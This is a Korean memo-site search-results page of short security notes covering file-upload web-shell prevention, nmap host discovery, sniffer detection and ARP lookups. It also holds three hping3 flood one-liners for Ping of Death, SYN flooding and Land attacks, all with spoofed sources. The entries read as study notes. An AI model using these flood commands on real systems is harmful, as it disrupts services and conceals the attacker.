메모智 유머사진 환영합니다, 손님!    메모지 | 회원가입 | 로그인
검색도움말 메모지 검색
  재미메모智.COM 설치   •   메모智 홈   •   바깥고리   •   전체 메모智 목록   •   회원가입   •   로그인   •   도움말   •  
  메모智 검색 - 보안
검색 관련 꼬리표 구름 #보안 #정보보안 #2010 #IP보안 #downloader.py #error #hp프린터 #https #metagoofil #session fixation #네트워크해킹 #보안인증서 #세션탈취 #양대일 #웹보안 #웹프록시 #웹프린터 #웹해킹 #윈도우 #인쇄보안 #정보 보안 개론과 실습 네트워크 해킹과 보안 #프린터 #해킹
파일업로드 취약점 방지 방법 1: 응급 대책 - .htaccess로 스크립트 실행제한
이미 파일업로드 취약점이 있어서 웹쉘이 실행되는 경우에는 업로드 디렉토리에서의 악성스크립트 실행을 방지한다. 1) .htaccess 파일 업로드가 불가능하도록 서버측의 파일 업로드 스크립트를 급히 수정한다. 2) 업로드 디렉토리에 다음과 같은 내용을 가진 .htaccess 파...
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
파일업로드 취약점 방지 방법 2: 근본 대책
서버의 파일 업로드 스크립트 내에서 업로드 허용/불허 확장자 목록을 설정한다. 또는 업로드되는 파일의 이름과 확장자를 모두 없애고 새로운 이름으로 부여한다.
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
cover-nmap-host-scan.png
인터넷 호스트 스캔 (host scan/discovery with nmap)
Host Discovery with nMap / Mark Wolfgang
| 공개 | 댓글: 1 | 첨부파일: 4 | 등록자: jinsuk | 등록일: |  
port-usage-all.pngport-usage-gt0.001.pngport-usage-gt0.01.png
Nmap에서 제공하는 모든 포트의 개방율(open-frequency)
port별로 사용율(전체를 1로 했을 때 열려있는 비율)을 그래프로 그려봤다. 기초자료: https://svn.nmap.org/nmap/nmap-services
| 공개 | 댓글: 3 | 첨부파일: 6 | 등록자: jinsuk | 등록일: |  
LAN내에서 IP별 MAC주소 알아내기 / fping, arp
# fping -a -g 192.168.0.1/24 # arp -a
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
nmap을 이용한 sniffing 후보 LAN 카드 찾아내기
# nmap --script=sniffer-detect 192.168.0.1/24 실제로는 promiscuous mode로 작동하고 있는 네트워크 카드 찾아내기.
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
Ping of Death 공격법
hping3 --icmp --rand-source 192.168.0.159 -d 65000 --flood icmp로 공격자 IP 무작위 설정, 패킷길이 65kb, flooding으로 가능한 많이 보내기.
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
SYN Flooding 공격
hping3 --rand-source 192.168.0.128 -p 80 -S --flood 공격자 IP를 무작위로 위장, 80 포트로 TCP SYN (-S옵션)을 가능한 많이.
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
Land공격
hping3 192.168.0.111 -a 192.168.0.111 --icmp --flood 공격자 IP를 공격대상 IP로 변경하여 ICMP 패킷 홍수방출. 패킷꼬리물기...
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
현재 검색결과내 꼬리표 모음 # #.htaccess #DoS공격 #IP #Land 공격 #MAC Address #Ping of Death #TCP SYN Flooding #arp #fping #host discovery #host scan #hping3 #nmap #promiscuous mode #sniffer-detect #sniffer-detect.nse #스니핑 #스니핑탐지 #업로드취약점 #포트개방빈도 #포트사용빈도 #포트사용율
메모智 열람: [1<이전]  4 / 7 (총 61 건)  [다음>1]    [처음]  

 

drupal hit counter

Site Stat
검색
Custom Search
모든 지식은 개인의 소유입니다.
그 외의 다른 내용은 Copyright © since 2010, 메모智.com이 가집니다.
메모지사용시 주의사항연락처powered by 크리스탈